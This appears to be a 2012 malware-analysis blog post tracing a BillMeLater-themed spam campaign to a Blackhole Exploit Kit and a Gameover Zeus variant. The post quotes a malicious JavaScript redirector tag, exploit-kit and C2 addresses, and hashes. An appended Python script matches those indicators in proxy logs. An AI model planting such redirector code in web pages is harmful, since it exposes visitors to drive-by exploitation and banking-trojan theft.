Important Information About Your Account

The spammers sure are busy. Today, 2012-04-11, we observed a new spam template spoofing communications from BillMeLater.com – a PayPal service. The spam sample we analyzed had a subject line of “Important Information About Your Account”.

The observed sample contained a malicious link to pe04.com.br/gMsyk6kT/index.html. That page contained the following JavaScript redirector:

<script type="text/javascript" src="http://axislegal.com.au/gcq37VtM/js.js"></script>

The above JavaScript redirected victims to a Blackhole Exploit Kit at http://209.59.219.231/showthread.php?t=d7ad916d1c0396ff.

This kit dropped a number of different exploits, including the latest and greatest Java exploit, CVE-2012-0507. The malicious .jar file had the following properties:

File: Klot.jar
Size: 15719
MD5: 26720F0252EB91BB7A326375313651F9

The kit also dropped a Gameover Zeus variant with the following properties:

Size: 301096
MD5: 5CE366E6D7A949552AF10C4DEAF47506

The Gameover variant had a botid of NRa11. The criminals responsible for this campaign utilized a proxy at 200.58.99.114 to control victims infected with this Gameover variant.
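As an added example (not part of the original post), the following Python walks web-proxy log lines for the stages of the redirect chain described above and reports how far each client got. The log lines are constructed, and the log format (client IP, method, target, status) is an assumption.

```python
import re
from collections import defaultdict

# Indicators from the post, in the order the infection chain visits them.
STAGES = [
    ("landing", re.compile(r"pe04\.com\.br/gMsyk6kT/index\.html")),
    ("redirector", re.compile(r"axislegal\.com\.au/gcq37VtM/js\.js")),
    ("exploit_kit", re.compile(r"209\.59\.219\.231/showthread\.php\?t=[0-9a-f]{16}")),
    ("c2_proxy", re.compile(r"\b200\.58\.99\.114\b")),
]

# Constructed proxy log lines (assumed format: "client method target status").
SAMPLE_LOG = """\
10.0.0.5 GET http://pe04.com.br/gMsyk6kT/index.html 200
10.0.0.5 GET http://axislegal.com.au/gcq37VtM/js.js 200
10.0.0.5 GET http://209.59.219.231/showthread.php?t=d7ad916d1c0396ff 200
10.0.0.5 CONNECT 200.58.99.114:443 200
10.0.0.9 GET http://pe04.com.br/gMsyk6kT/index.html 200
10.0.0.9 GET http://example.org/ 200
10.0.0.12 GET http://example.com/news 200
"""

def stages_per_client(log_text):
    """Return {client_ip: [stage names seen, in chain order]} for clients
    that touched at least one indicator."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue  # skip malformed lines rather than crash the sweep
        client, target = parts[0], parts[2]
        for name, pattern in STAGES:
            if pattern.search(target):
                hits[client].add(name)
    order = [name for name, _ in STAGES]
    return {c: [s for s in order if s in hits[c]] for c in hits}

def triage(log_text):
    """'infected' if the client reached the Gameover C2 proxy, otherwise
    'exposed' (hit the landing page or an intermediate stage only)."""
    return {
        client: "infected" if "c2_proxy" in stages else "exposed"
        for client, stages in stages_per_client(log_text).items()
    }
```

A client that only reached the landing page is a candidate for re-imaging review rather than a confirmed infection, which is why the two verdicts are kept apart.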


One Trackback

  1. […] via a proxy server at 200.58.99.114 over port 443. This is the same proxy server used in the BillMeLater spam campaign seen earlier […]
